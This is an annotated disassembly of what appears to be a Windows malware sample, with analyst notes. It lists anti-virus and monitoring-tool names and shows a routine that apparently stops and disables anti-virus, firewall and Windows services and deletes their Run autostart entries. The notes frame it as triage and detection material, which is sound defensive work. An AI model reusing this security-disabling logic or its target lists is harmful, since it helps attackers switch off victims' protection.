00406C2B 00 DB 00
00406C2C CA DB CA
00406C2D C9 DB C9
00406C2E BE DB BE
00406C2F FA DB FA
00406C30 CC INT3
00406C31 E5 DB E5
00406C32 00 DB 00
00406C33 00 DB 00
; ---------------------------------------------------------------------------
; String constants in a Delphi-style long-string layout: 4 bytes FF FF FF FF,
; a 4-byte length, then the text. The record at 00406C34 was left as raw bytes
; by the disassembler: FF FF FF FF, length 0Eh, then 14 non-ASCII bytes.
; NOTE(review): those 14 bytes look like GBK-encoded Chinese text (a tool or
; window title) - decode with a GBK codec to confirm.
; The code that reads these strings is outside this listing.
; ---------------------------------------------------------------------------
00406C34 FF DB FF
00406C35 FF DB FF
00406C36 FF DB FF
00406C37 FF DB FF
00406C38 0E DB 0E
00406C39 00 DB 00
00406C3A 00 DB 00
00406C3B 00 DB 00
00406C3C C4 DB C4
00406C3D BE DB BE
00406C3E C2 DB C2
00406C3F ED DB ED
00406C40 B8 DB B8
00406C41 A8 DB A8
00406C42 D6 DB D6
00406C43 FA DB FA
00406C44 B2 DB B2
00406C45 E9 DB E9
00406C46 D5 DB D5
00406C47 D2 DB D2
00406C48 C6 DB C6
00406C49 F7 DB F7
00406C4A 00 DB 00
00406C4B 00 DB 00
; Three ASCII records in the same layout (lengths 15h, 13h, 0Eh).
; NOTE(review): the texts appear to be titles of security/monitoring tools;
; presumably window captions the sample searches for - confirm via the
; cross-references to 00406C54, 00406C74 and 00406C90.
00406C4C . FFFFFFFF DD FFFFFFFF
00406C50 . 15000000 DD 00000015
00406C54 . 53 79 73 74 6>ASCII "System Safety Mo"
00406C64 . 6E 69 74 6F 7>ASCII "nitor",0
00406C6A 00 DB 00
00406C6B 00 DB 00
00406C6C . FFFFFFFF DD FFFFFFFF
00406C70 . 13000000 DD 00000013
00406C74 . 57 72 61 70 7>ASCII "Wrapped gift Kil"
00406C84 . 6C 65 72 00 ASCII "ler",0
00406C88 . FFFFFFFF DD FFFFFFFF
00406C8C . 0E000000 DD 0000000E
00406C90 . 57 69 6E 73 6>ASCII "Winsock Expert",0
00406C9F 00 DB 00
00406CA0 FF DB FF
00406CA1 FF DB FF
00406CA2 FF DB FF
00406CA3 FF DB FF
00406CA4 10 DB 10
00406CA5 00 DB 00
00406CA6 00 DB 00
00406CA7 00 DB 00
00406CA8 D3 DB D3
00406CA9 CE DB CE
00406CAA CF DB CF
00406CAB B7 DB B7
00406CAC C4 DB C4
00406CAD BE DB BE
00406CAE C2 DB C2
00406CAF ED DB ED
00406CB0 BC DB BC
00406CB1 EC DB EC
00406CB2 B2 DB B2
00406CB3 E2 DB E2
00406CB4 B4 DB B4
00406CB5 F3 DB F3
00406CB6 CA DB CA
00406CB7 A6 DB A6
00406CB8 00 DB 00
00406CB9 00 DB 00
00406CBA 00 DB 00
00406CBB 00 DB 00
00406CBC FF DB FF
00406CBD FF DB FF
00406CBE FF DB FF
00406CBF FF DB FF
00406CC0 08 DB 08
00406CC1 00 DB 00
00406CC2 00 DB 00
00406CC3 00 DB 00
00406CC4 B3 DB B3
00406CC5 AC DB AC
00406CC6 BC DB BC
00406CC7 B6 DB B6
00406CC8 D1 DB D1
00406CC9 B2 DB B2
00406CCA BE DB BE
00406CCB AF DB AF
00406CCC 00 DB 00
00406CCD 00 DB 00
00406CCE 00 DB 00
00406CCF 00 DB 00
00406CD0 . 6D 73 63 74 6>ASCII "msctls_statusbar"
00406CE0 . 33 32 00 ASCII "32",0
00406CE3 00 DB 00
00406CE4 . FFFFFFFF DD FFFFFFFF
00406CE8 . 09000000 DD 00000009
00406CEC . 70 6A 66 28 7>ASCII "pjf(ustc)",0
00406CF6 00 DB 00
00406CF7 00 DB 00
00406CF8 . 49 63 65 53 7>ASCII "IceSword",0
00406D01 00 DB 00
00406D02 00 DB 00
00406D03 00 DB 00
; ---------------------------------------------------------------------------
; First of a run of string constants (00406D04 through 00406F30) that hold
; executable file names: anti-virus components plus the Windows tools
; regedit.exe, msconfig.exe and taskmgr.exe.
; NOTE(review): the consumer is outside this listing; presumably a list of
; process names to look for - confirm via cross-references. For triage the
; run is usable as a string signature for this sample.
; ---------------------------------------------------------------------------
00406D04 . FFFFFFFF DD FFFFFFFF
00406D08 . 0C000000 DD 0000000C
00406D0C . 4D 63 73 68 6>ASCII "Mcshield.exe",0
00406D19 00 DB 00
00406D1A 00 DB 00
00406D1B 00 DB 00
00406D1C . FFFFFFFF DD FFFFFFFF
00406D20 . 0C000000 DD 0000000C
00406D24 . 56 73 54 73 6>ASCII "VsTskMgr.exe",0
00406D31 00 DB 00
00406D32 00 DB 00
00406D33 00 DB 00
00406D34 . FFFFFFFF DD FFFFFFFF
00406D38 . 0C000000 DD 0000000C
00406D3C . 6E 61 50 72 6>ASCII "naPrdMgr.exe",0
00406D49 00 DB 00
00406D4A 00 DB 00
00406D4B 00 DB 00
00406D4C . FFFFFFFF DD FFFFFFFF
00406D50 . 0D000000 DD 0000000D
00406D54 . 55 70 64 61 7>ASCII "UpdaterUI.exe",0
00406D62 00 DB 00
00406D63 00 DB 00
00406D64 . FFFFFFFF DD FFFFFFFF
00406D68 . 09000000 DD 00000009
00406D6C . 54 42 4D 6F 6>ASCII "TBMon.exe",0
00406D76 00 DB 00
00406D77 00 DB 00
00406D78 . FFFFFFFF DD FFFFFFFF
00406D7C . 0A000000 DD 0000000A
00406D80 . 73 63 61 6E 3>ASCII "scan32.exe",0
00406D8B 00 DB 00
00406D8C . FFFFFFFF DD FFFFFFFF
00406D90 . 0B000000 DD 0000000B
00406D94 . 52 61 76 6D 6>ASCII "Ravmond.exe",0
00406DA0 . FFFFFFFF DD FFFFFFFF
00406DA4 . 0B000000 DD 0000000B
00406DA8 . 43 43 65 6E 7>ASCII "CCenter.exe",0
00406DB4 . FFFFFFFF DD FFFFFFFF
00406DB8 . 0B000000 DD 0000000B
00406DBC . 52 61 76 54 6>ASCII "RavTask.exe",0
00406DC8 . FFFFFFFF DD FFFFFFFF
00406DCC . 07000000 DD 00000007
00406DD0 . 52 61 76 2E 6>ASCII "Rav.exe",0
00406DD8 . FFFFFFFF DD FFFFFFFF
00406DDC . 0A000000 DD 0000000A
00406DE0 . 52 61 76 6D 6>ASCII "Ravmon.exe",0
00406DEB 00 DB 00
00406DEC . FFFFFFFF DD FFFFFFFF
00406DF0 . 0B000000 DD 0000000B
00406DF4 . 52 61 76 6D 6>ASCII "RavmonD.exe",0
00406E00 . FFFFFFFF DD FFFFFFFF
00406E04 . 0B000000 DD 0000000B
00406E08 . 52 61 76 53 7>ASCII "RavStub.exe",0
00406E14 . FFFFFFFF DD FFFFFFFF
00406E18 . 08000000 DD 00000008
00406E1C . 4B 56 58 50 2>ASCII "KVXP.kxp",0
00406E25 00 DB 00
00406E26 00 DB 00
00406E27 00 DB 00
00406E28 . FFFFFFFF DD FFFFFFFF
00406E2C . 0B000000 DD 0000000B
00406E30 . 4B 76 4D 6F 6>ASCII "KvMonXP.kxp",0
00406E3C . FFFFFFFF DD FFFFFFFF
00406E40 . 0C000000 DD 0000000C
00406E44 . 4B 56 43 65 6>ASCII "KVCenter.kxp",0
00406E51 00 DB 00
00406E52 00 DB 00
00406E53 00 DB 00
00406E54 . FFFFFFFF DD FFFFFFFF
00406E58 . 0B000000 DD 0000000B
00406E5C . 4B 56 53 72 7>ASCII "KVSrvXP.exe",0
00406E68 . FFFFFFFF DD FFFFFFFF
00406E6C . 0A000000 DD 0000000A
00406E70 . 4B 52 65 67 4>ASCII "KRegEx.exe",0
00406E7B 00 DB 00
00406E7C . FFFFFFFF DD FFFFFFFF
00406E80 . 0A000000 DD 0000000A
00406E84 . 55 49 48 6F 7>ASCII "UIHost.exe",0
00406E8F 00 DB 00
00406E90 . FFFFFFFF DD FFFFFFFF
00406E94 . 0B000000 DD 0000000B
00406E98 . 54 72 6F 6A 4>ASCII "TrojDie.kxp",0
00406EA4 . FFFFFFFF DD FFFFFFFF
00406EA8 . 0D000000 DD 0000000D
00406EAC . 46 72 6F 67 4>ASCII "FrogAgent.exe",0
00406EBA 00 DB 00
00406EBB 00 DB 00
00406EBC . FFFFFFFF DD FFFFFFFF
00406EC0 . 0A000000 DD 0000000A
00406EC4 . 4C 6F 67 6F 3>ASCII "Logo1_.exe",0
00406ECF 00 DB 00
00406ED0 . FFFFFFFF DD FFFFFFFF
00406ED4 . 0A000000 DD 0000000A
00406ED8 . 4C 6F 67 6F 5>ASCII "Logo_1.exe",0
00406EE3 00 DB 00
00406EE4 . FFFFFFFF DD FFFFFFFF
00406EE8 . 0C000000 DD 0000000C
00406EEC . 52 75 6E 64 6>ASCII "Rundl132.exe",0
00406EF9 00 DB 00
00406EFA 00 DB 00
00406EFB 00 DB 00
00406EFC . FFFFFFFF DD FFFFFFFF
00406F00 . 0B000000 DD 0000000B
00406F04 . 72 65 67 65 6>ASCII "regedit.exe",0
00406F10 . FFFFFFFF DD FFFFFFFF
00406F14 . 0C000000 DD 0000000C
00406F18 . 6D 73 63 6F 6>ASCII "msconfig.exe",0
00406F25 00 DB 00
00406F26 00 DB 00
00406F27 00 DB 00
00406F28 . FFFFFFFF DD FFFFFFFF
00406F2C . 0B000000 DD 0000000B
00406F30 . 74 61 73 6B 6>ASCII "taskmgr.exe",0
; ---------------------------------------------------------------------------
; 00406F3C - start a worker thread at 004062C8.
; Equivalent call: CreateThread(NULL, 0, 004062C8, NULL, 0, &tid).
; Out:   EAX = CreateThread result (the handle is not closed here).
; Clobb: EDX (receives the discarded thread-id slot).
; The thread routine 004062C8 is outside this listing.
; ---------------------------------------------------------------------------
00406F3C /$ 51 PUSH ECX                          ; reserve one dword on the stack for the thread id
00406F3D |. 54 PUSH ESP ; /pThreadId
00406F3E |. 6A 00 PUSH 0 ; |CreationFlags = 0
00406F40 |. 6A 00 PUSH 0 ; |pThreadParm = NULL
00406F42 |. 68 C8624000 PUSH setup_un.004062C8 ; |ThreadFunction = setup_un.004062C8
00406F47 |. 6A 00 PUSH 0 ; |StackSize = 0
00406F49 |. 6A 00 PUSH 0 ; |pSecurity = NULL
00406F4B |. E8 ACDBFFFF CALL <JMP.&kernel32.CreateThread> ; \CreateThread
00406F50 |. 5A POP EDX                           ; drop the thread-id slot
00406F51 \. C3 RETN
00406F52 8BC0 MOV EAX,EAX
; ---------------------------------------------------------------------------
; 00406F54 - thread routine (passed to CreateThread by the stub at 00407540).
; Straight-line sequence of helper calls with arguments in EAX/EDX, walking
; the string table at 00407124-00407538:
;   00405CCC(EAX = name)   - called with header-prefixed (long-string) names
;   00405D50(EAX = name)   - called with plain zero-terminated names
;   00405B60(EAX = 80000002h, EDX = path)
;                          - 80000002h is HKEY_LOCAL_MACHINE; each path is
;                            SOFTWARE\Microsoft\Windows\CurrentVersion\Run\<entry>
; NOTE(review): the three helpers are outside this listing. Presumably they
; stop a service, remove or disable it, and delete a Run autostart entry -
; confirm by reading 00405CCC, 00405D50 and 00405B60.
; The names include Windows services (Schedule, sharedaccess, wscsvc) and
; service/autostart names of anti-virus and firewall products.
; Defender note: a burst of service-control operations and HKLM Run-key
; changes against these names from one process is a tamper indicator; the
; names below can seed detection rules.
; No return value is set; helper results are ignored.
; ---------------------------------------------------------------------------
; --- Windows services and RsCCenter / RsRavMon ---
00406F54 . B8 24714000 MOV EAX,setup_un.00407124 ; schedule
00406F59 . E8 6EEDFFFF CALL setup_un.00405CCC
00406F5E . B8 38714000 MOV EAX,setup_un.00407138 ; sharedaccess
00406F63 . E8 64EDFFFF CALL setup_un.00405CCC
00406F68 . B8 50714000 MOV EAX,setup_un.00407150 ; rsccenter
00406F6D . E8 5AEDFFFF CALL setup_un.00405CCC
00406F72 . B8 64714000 MOV EAX,setup_un.00407164 ; rsravmon
00406F77 . E8 50EDFFFF CALL setup_un.00405CCC
00406F7C . B8 70714000 MOV EAX,setup_un.00407170 ; rsccenter
00406F81 . E8 CAEDFFFF CALL setup_un.00405D50
00406F86 . B8 7C714000 MOV EAX,setup_un.0040717C ; rsravmon
00406F8B . E8 C0EDFFFF CALL setup_un.00405D50
00406F90 . BA 90714000 MOV EDX,setup_un.00407190 ; software\microsoft\windows\currentversion\run\ravtask
00406F95 . B8 02000080 MOV EAX,80000002
00406F9A . E8 C1EBFFFF CALL setup_un.00405B60
; --- KVWSC / KVSrvXP and the KvMonXP Run entry ---
00406F9F . B8 D0714000 MOV EAX,setup_un.004071D0 ; kvwsc
00406FA4 . E8 23EDFFFF CALL setup_un.00405CCC
00406FA9 . B8 E0714000 MOV EAX,setup_un.004071E0 ; kvsrvxp
00406FAE . E8 19EDFFFF CALL setup_un.00405CCC
00406FB3 . B8 E8714000 MOV EAX,setup_un.004071E8 ; kvwsc
00406FB8 . E8 93EDFFFF CALL setup_un.00405D50
00406FBD . B8 F0714000 MOV EAX,setup_un.004071F0 ; kvsrvxp
00406FC2 . E8 89EDFFFF CALL setup_un.00405D50
00406FC7 . BA 00724000 MOV EDX,setup_un.00407200 ; software\microsoft\windows\currentversion\run\kvmonxp
00406FCC . B8 02000080 MOV EAX,80000002
00406FD1 . E8 8AEBFFFF CALL setup_un.00405B60
; --- kavsvc / AVP and the kav, KAVPersonal50 Run entries ---
00406FD6 . B8 40724000 MOV EAX,setup_un.00407240 ; kavsvc
00406FDB . E8 ECECFFFF CALL setup_un.00405CCC
00406FE0 . B8 50724000 MOV EAX,setup_un.00407250 ; avp
00406FE5 . E8 E2ECFFFF CALL setup_un.00405CCC
00406FEA . B8 54724000 MOV EAX,setup_un.00407254 ; avp
00406FEF . E8 5CEDFFFF CALL setup_un.00405D50
00406FF4 . B8 58724000 MOV EAX,setup_un.00407258 ; kavsvc
00406FF9 . E8 52EDFFFF CALL setup_un.00405D50
00406FFE . BA 68724000 MOV EDX,setup_un.00407268 ; software\microsoft\windows\currentversion\run\kav
00407003 . B8 02000080 MOV EAX,80000002
00407008 . E8 53EBFFFF CALL setup_un.00405B60
0040700D . BA A4724000 MOV EDX,setup_un.004072A4 ; software\microsoft\windows\currentversion\run\kavpersonal50
00407012 . B8 02000080 MOV EAX,80000002
00407017 . E8 44EBFFFF CALL setup_un.00405B60
; --- McAfee service names and Run entries ---
0040701C . B8 E8724000 MOV EAX,setup_un.004072E8 ; mcafeeframework
00407021 . E8 A6ECFFFF CALL setup_un.00405CCC
00407026 . B8 00734000 MOV EAX,setup_un.00407300 ; mcshield
0040702B . E8 9CECFFFF CALL setup_un.00405CCC
00407030 . B8 14734000 MOV EAX,setup_un.00407314 ; mctaskmanager
00407035 . E8 92ECFFFF CALL setup_un.00405CCC
0040703A . B8 24734000 MOV EAX,setup_un.00407324 ; mcafeeframework
0040703F . E8 0CEDFFFF CALL setup_un.00405D50
00407044 . B8 34734000 MOV EAX,setup_un.00407334 ; mcshield
00407049 . E8 02EDFFFF CALL setup_un.00405D50
0040704E . B8 40734000 MOV EAX,setup_un.00407340 ; mctaskmanager
00407053 . E8 F8ECFFFF CALL setup_un.00405D50
00407058 . BA 58734000 MOV EDX,setup_un.00407358 ; software\microsoft\windows\currentversion\run\mcafeeupdaterui
0040705D . B8 02000080 MOV EAX,80000002
00407062 . E8 F9EAFFFF CALL setup_un.00405B60
00407067 . BA A0734000 MOV EDX,setup_un.004073A0 ; software\microsoft\windows\currentversion\run\network associates error reporting service
0040706C . B8 02000080 MOV EAX,80000002
00407071 . E8 EAEAFFFF CALL setup_un.00405B60
00407076 . BA 04744000 MOV EDX,setup_un.00407404 ; software\microsoft\windows\currentversion\run\shstatexe
0040707B . B8 02000080 MOV EAX,80000002
00407080 . E8 DBEAFFFF CALL setup_un.00405B60
; --- Names passed only to 00405D50 (no preceding 00405CCC call) ---
00407085 . B8 3C744000 MOV EAX,setup_un.0040743C ; navapsvc
0040708A . E8 C1ECFFFF CALL setup_un.00405D50
0040708F . B8 48744000 MOV EAX,setup_un.00407448 ; wscsvc
00407094 . E8 B7ECFFFF CALL setup_un.00405D50
00407099 . B8 50744000 MOV EAX,setup_un.00407450 ; kpfwsvc
0040709E . E8 ADECFFFF CALL setup_un.00405D50
004070A3 . B8 58744000 MOV EAX,setup_un.00407458 ; sndsrvc
004070A8 . E8 A3ECFFFF CALL setup_un.00405D50
004070AD . B8 60744000 MOV EAX,setup_un.00407460 ; ccproxy
004070B2 . E8 99ECFFFF CALL setup_un.00405D50
004070B7 . B8 68744000 MOV EAX,setup_un.00407468 ; ccevtmgr
004070BC . E8 8FECFFFF CALL setup_un.00405D50
004070C1 . B8 74744000 MOV EAX,setup_un.00407474 ; ccsetmgr
004070C6 . E8 85ECFFFF CALL setup_un.00405D50
004070CB . B8 80744000 MOV EAX,setup_un.00407480 ; spbbcsvc
004070D0 . E8 7BECFFFF CALL setup_un.00405D50
004070D5 . B8 8C744000 MOV EAX,setup_un.0040748C ; symantec core lc
004070DA . E8 71ECFFFF CALL setup_un.00405D50
004070DF . B8 A0744000 MOV EAX,setup_un.004074A0 ; npfmntor
004070E4 . E8 67ECFFFF CALL setup_un.00405D50
004070E9 . B8 AC744000 MOV EAX,setup_un.004074AC ; mskservice
004070EE . E8 5DECFFFF CALL setup_un.00405D50
004070F3 . B8 B8744000 MOV EAX,setup_un.004074B8 ; firesvc
004070F8 . E8 53ECFFFF CALL setup_un.00405D50
; --- Remaining Run entries: YLive.exe and yassistse ---
004070FD . BA C8744000 MOV EDX,setup_un.004074C8 ; software\microsoft\windows\currentversion\run\ylive.exe
00407102 . B8 02000080 MOV EAX,80000002
00407107 . E8 54EAFFFF CALL setup_un.00405B60
0040710C . BA 08754000 MOV EDX,setup_un.00407508 ; software\microsoft\windows\currentversion\run\yassistse
00407111 . B8 02000080 MOV EAX,80000002
00407116 . E8 45EAFFFF CALL setup_un.00405B60
0040711B . C3 RETN
; ---------------------------------------------------------------------------
; Start of the string table used by the routine at 00406F54
; (00407124 through 00407538). Record layout: DD FFFFFFFF, DD length, text.
; Entries carrying this header are the ones passed to 00405CCC and 00405B60;
; the header-less duplicates (for example 00407170) are passed to 00405D50.
; ---------------------------------------------------------------------------
0040711C . FFFFFFFF DD FFFFFFFF
00407120 . 08000000 DD 00000008
00407124 . 53 63 68 65 6>ASCII "Schedule",0
0040712D 00 DB 00
0040712E 00 DB 00
0040712F 00 DB 00
00407130 . FFFFFFFF DD FFFFFFFF
00407134 . 0C000000 DD 0000000C
00407138 . 73 68 61 72 6>ASCII "sharedaccess",0
00407145 00 DB 00
00407146 00 DB 00
00407147 00 DB 00
00407148 . FFFFFFFF DD FFFFFFFF
0040714C . 09000000 DD 00000009
00407150 . 52 73 43 43 6>ASCII "RsCCenter",0
0040715A 00 DB 00
0040715B 00 DB 00
0040715C . FFFFFFFF DD FFFFFFFF
00407160 . 08000000 DD 00000008
00407164 . 52 73 52 61 7>ASCII "RsRavMon",0
0040716D 00 DB 00
0040716E 00 DB 00
0040716F 00 DB 00
00407170 . 52 73 43 43 6>ASCII "RsCCenter",0
0040717A 00 DB 00
0040717B 00 DB 00
0040717C . 52 73 52 61 7>ASCII "RsRavMon",0
00407185 00 DB 00
00407186 00 DB 00
00407187 00 DB 00
00407188 . FFFFFFFF DD FFFFFFFF
0040718C . 35000000 DD 00000035
00407190 . 53 4F 46 54 5>ASCII "SOFTWARE\Microso"
004071A0 . 66 74 5C 57 6>ASCII "ft\Windows\Curre"
004071B0 . 6E 74 56 65 7>ASCII "ntVersion\Run\Ra"
004071C0 . 76 54 61 73 6>ASCII "vTask",0
004071C6 00 DB 00
004071C7 00 DB 00
004071C8 . FFFFFFFF DD FFFFFFFF
004071CC . 05000000 DD 00000005
004071D0 . 4B 56 57 53 4>ASCII "KVWSC",0
004071D6 00 DB 00
004071D7 00 DB 00
004071D8 . FFFFFFFF DD FFFFFFFF
004071DC . 07000000 DD 00000007
004071E0 . 4B 56 53 72 7>ASCII "KVSrvXP",0
004071E8 . 4B 56 57 53 4>ASCII "KVWSC",0
004071EE 00 DB 00
004071EF 00 DB 00
004071F0 . 4B 56 53 72 7>ASCII "KVSrvXP",0
004071F8 . FFFFFFFF DD FFFFFFFF
004071FC . 35000000 DD 00000035
00407200 . 53 4F 46 54 5>ASCII "SOFTWARE\Microso"
00407210 . 66 74 5C 57 6>ASCII "ft\Windows\Curre"
00407220 . 6E 74 56 65 7>ASCII "ntVersion\Run\Kv"
00407230 . 4D 6F 6E 58 5>ASCII "MonXP",0
00407236 00 DB 00
00407237 00 DB 00
00407238 . FFFFFFFF DD FFFFFFFF
0040723C . 06000000 DD 00000006
00407240 . 6B 61 76 73 7>ASCII "kavsvc",0
00407247 00 DB 00
00407248 . FFFFFFFF DD FFFFFFFF
0040724C . 03000000 DD 00000003
00407250 . 41 56 50 00 ASCII "AVP",0
00407254 . 41 56 50 00 ASCII "AVP",0
00407258 . 6B 61 76 73 7>ASCII "kavsvc",0
0040725F 00 DB 00
00407260 . FFFFFFFF DD FFFFFFFF
00407264 . 31000000 DD 00000031
00407268 . 53 4F 46 54 5>ASCII "SOFTWARE\Microso"
00407278 . 66 74 5C 57 6>ASCII "ft\Windows\Curre"
00407288 . 6E 74 56 65 7>ASCII "ntVersion\Run\ka"
00407298 . 76 00 ASCII "v",0
0040729A 00 DB 00
0040729B 00 DB 00
0040729C . FFFFFFFF DD FFFFFFFF
004072A0 . 3B000000 DD 0000003B
004072A4 . 53 4F 46 54 5>ASCII "SOFTWARE\Microso"
004072B4 . 66 74 5C 57 6>ASCII "ft\Windows\Curre"
004072C4 . 6E 74 56 65 7>ASCII "ntVersion\Run\KA"
004072D4 . 56 50 65 72 7>ASCII "VPersonal50",0
004072E0 . FFFFFFFF DD FFFFFFFF
004072E4 . 0F000000 DD 0000000F
004072E8 . 4D 63 41 66 6>ASCII "McAfeeFramework",0
004072F8 . FFFFFFFF DD FFFFFFFF
004072FC . 08000000 DD 00000008
00407300 . 4D 63 53 68 6>ASCII "McShield",0
00407309 00 DB 00
0040730A 00 DB 00
0040730B 00 DB 00
0040730C . FFFFFFFF DD FFFFFFFF
00407310 . 0D000000 DD 0000000D
00407314 . 4D 63 54 61 7>ASCII "McTaskManager",0
00407322 00 DB 00
00407323 00 DB 00
00407324 . 4D 63 41 66 6>ASCII "McAfeeFramework",0
00407334 . 4D 63 53 68 6>ASCII "McShield",0
0040733D 00 DB 00
0040733E 00 DB 00
0040733F 00 DB 00
00407340 . 4D 63 54 61 7>ASCII "McTaskManager",0
0040734E 00 DB 00
0040734F 00 DB 00
00407350 . FFFFFFFF DD FFFFFFFF
00407354 . 3D000000 DD 0000003D
00407358 . 53 4F 46 54 5>ASCII "SOFTWARE\Microso"
00407368 . 66 74 5C 57 6>ASCII "ft\Windows\Curre"
00407378 . 6E 74 56 65 7>ASCII "ntVersion\Run\Mc"
00407388 . 41 66 65 65 5>ASCII "AfeeUpdaterUI",0
00407396 00 DB 00
00407397 00 DB 00
00407398 . FFFFFFFF DD FFFFFFFF
0040739C . 58000000 DD 00000058
004073A0 . 53 4F 46 54 5>ASCII "SOFTWARE\Microso"
004073B0 . 66 74 5C 57 6>ASCII "ft\Windows\Curre"
004073C0 . 6E 74 56 65 7>ASCII "ntVersion\Run\Ne"
004073D0 . 74 77 6F 72 6>ASCII "twork Associates"
004073E0 . 20 45 72 72 6>ASCII " Error Reporting"
004073F0 . 20 53 65 72 7>ASCII " Service",0
004073F9 00 DB 00
004073FA 00 DB 00
004073FB 00 DB 00
004073FC . FFFFFFFF DD FFFFFFFF
00407400 . 37000000 DD 00000037
00407404 . 53 4F 46 54 5>ASCII "SOFTWARE\Microso"
00407414 . 66 74 5C 57 6>ASCII "ft\Windows\Curre"
00407424 . 6E 74 56 65 7>ASCII "ntVersion\Run\Sh"
00407434 . 53 74 61 74 4>ASCII "StatEXE",0
0040743C . 6E 61 76 61 7>ASCII "navapsvc",0
00407445 00 DB 00
00407446 00 DB 00
00407447 00 DB 00
00407448 . 77 73 63 73 7>ASCII "wscsvc",0
0040744F 00 DB 00
00407450 . 4B 50 66 77 5>ASCII "KPfwSvc",0
00407458 . 53 4E 44 53 7>ASCII "SNDSrvc",0
00407460 . 63 63 50 72 6>ASCII "ccProxy",0
00407468 . 63 63 45 76 7>ASCII "ccEvtMgr",0
00407471 00 DB 00
00407472 00 DB 00
00407473 00 DB 00
00407474 . 63 63 53 65 7>ASCII "ccSetMgr",0
0040747D 00 DB 00
0040747E 00 DB 00
0040747F 00 DB 00
00407480 . 53 50 42 42 4>ASCII "SPBBCSvc",0
00407489 00 DB 00
0040748A 00 DB 00
0040748B 00 DB 00
0040748C . 53 79 6D 61 6>ASCII "Symantec Core LC"
0040749C . 00 ASCII 0
0040749D 00 DB 00
0040749E 00 DB 00
0040749F 00 DB 00
004074A0 . 4E 50 46 4D 6>ASCII "NPFMntor",0
004074A9 00 DB 00
004074AA 00 DB 00
004074AB 00 DB 00
004074AC . 4D 73 6B 53 6>ASCII "MskService",0
004074B7 00 DB 00
004074B8 . 46 69 72 65 5>ASCII "FireSvc",0
004074C0 . FFFFFFFF DD FFFFFFFF
004074C4 . 37000000 DD 00000037
004074C8 . 53 4F 46 54 5>ASCII "SOFTWARE\Microso"
004074D8 . 66 74 5C 57 6>ASCII "ft\Windows\Curre"
004074E8 . 6E 74 56 65 7>ASCII "ntVersion\Run\YL"
004074F8 . 69 76 65 2E 6>ASCII "ive.exe",0
00407500 . FFFFFFFF DD FFFFFFFF
00407504 . 37000000 DD 00000037
00407508 . 53 4F 46 54 5>ASCII "SOFTWARE\Microso"
00407518 . 66 74 5C 57 6>ASCII "ft\Windows\Curre"
00407528 . 6E 74 56 65 7>ASCII "ntVersion\Run\ya"
00407538 . 73 73 69 73 7>ASCII "ssistse",0
; ---------------------------------------------------------------------------
; 00407540 - start a worker thread at 00406F54 (the routine that walks the
; service / Run-key string table).
; Equivalent call: CreateThread(NULL, 0, 00406F54, NULL, 0, &tid).
; Out:   EAX = CreateThread result (the handle is not closed here).
; Clobb: EDX (receives the discarded thread-id slot).
; ---------------------------------------------------------------------------
00407540 . 51 PUSH ECX                           ; reserve one dword on the stack for the thread id
00407541 . 54 PUSH ESP ; /pThreadId
00407542 . 6A 00 PUSH 0 ; |CreationFlags = 0
00407544 . 6A 00 PUSH 0 ; |pThreadParm = NULL
00407546 . 68 546F4000 PUSH setup_un.00406F54 ; |ThreadFunction = setup_un.00406F54
0040754B . 6A 00 PUSH 0 ; |StackSize = 0
0040754D . 6A 00 PUSH 0 ; |pSecurity = NULL
0040754F . E8 A8D5FFFF CALL <JMP.&kernel32.CreateThread> ; \CreateThread
00407554 . 5A POP EDX                            ; drop the thread-id slot
00407555 . C3 RETN
00407556 8BC0 MOV EAX,EAX
; ---------------------------------------------------------------------------
; 00407558 - increment the dword counter at 0040F790 inside an SEH frame.
; The frame (handler stub 0040757D) is installed at FS:[0], the counter is
; incremented, the frame is unlinked, and control reaches the epilogue at
; 00407584 through a PUSH/RETN pair.
; NOTE(review): looks like compiler-generated unit initialization (the
; routine at 00407588 decrements the same counter) - confirm from callers.
; ---------------------------------------------------------------------------
00407558 . 55 PUSH EBP
00407559 . 8BEC MOV EBP,ESP
0040755B . 33C0 XOR EAX,EAX
0040755D . 55 PUSH EBP
0040755E . 68 7D754000 PUSH setup_un.0040757D           ; handler address for the new frame
00407563 . 64:FF30 PUSH DWORD PTR FS:[EAX]               ; EAX = 0: save the previous frame from FS:[0]
00407566 . 64:8920 MOV DWORD PTR FS:[EAX],ESP            ; install the new frame
00407569 . FF05 90F74000 INC DWORD PTR DS:[40F790]
0040756F . 33C0 XOR EAX,EAX
00407571 . 5A POP EDX                                    ; EDX = previous frame pointer
00407572 . 59 POP ECX
00407573 . 59 POP ECX
00407574 . 64:8910 MOV DWORD PTR FS:[EAX],EDX            ; restore the previous frame
00407577 . 68 84754000 PUSH setup_un.00407584
0040757C > C3 RETN ; RET used as a jump to 00407584
0040757D .^ E9 E2C0FFFF JMP setup_un.00403664            ; handler stub; 00403664 is outside this listing
00407582 .^ EB F8 JMP SHORT setup_un.0040757C
00407584 > 5D POP EBP
00407585 . C3 RETN
00407586 8BC0 MOV EAX,EAX
; 00407588 - decrement the dword counter at 0040F790 (the one incremented at
; 00407569) and return. NOTE(review): presumably the matching finalization
; routine - confirm from callers.
00407588 . 832D 90F74000>SUB DWORD PTR DS:[40F790],1
0040758F . C3 RETN
00407590 94754000 DD setup_un.00407594
00407594 0A DB 0A
00407595 . 09 DB 09
00407596 . 54 46 69 6C 6>ASCII "TFileName"
0040759F 90 NOP
004075A0 . A4754000 DD setup_un.004075A4
004075A4 0E DB 0E
004075A5 . 0A DB 0A
004075A6 . 54 53 65 61 7>ASCII "TSearchRec"
004075B0 58 DB 58 ; CHAR 'X'
004075B1 01 DB 01
004075B2 00 DB 00
004075B3 00 DB 00
004075B4 01 DB 01
004075B5 00 DB 00
004075B6 00 DB 00
004075B7 00 DB 00
004075B8 90 NOP
004075B9 . 75 40 00 ASCII "u@",0
004075BC 0C DB 0C
004075BD 00 DB 00
004075BE 00 DB 00
004075BF 00 DB 00
; ---------------------------------------------------------------------------
; 004075C0 - advance a file search to the next entry that passes the
; attribute filter, then copy its details into the search record.
; In:    EAX = pointer to the search record (kept in EBX). Offsets used:
;          +00 DOS time, +02 DOS date, +04 size, +08 attributes, +0C name,
;          +10 attribute mask, +14 find handle, +18 find-data buffer passed
;          to FindNextFileA.
; Out:   EAX = 0 on success, otherwise the GetLastError value.
; The offsets +2C, +38 and +44 are +14h, +20h and +2Ch inside the find-data
; buffer, which match ftLastWriteTime, nFileSizeLow and cFileName of
; WIN32_FIND_DATAA.
; NOTE(review): layout matches the "TSearchRec" type named in the RTTI at
; 004075A4 - confirm.
; ---------------------------------------------------------------------------
004075C0 /$ 53 PUSH EBX
004075C1 |. 83C4 F8 ADD ESP,-8                           ; 8-byte local that receives the local file time
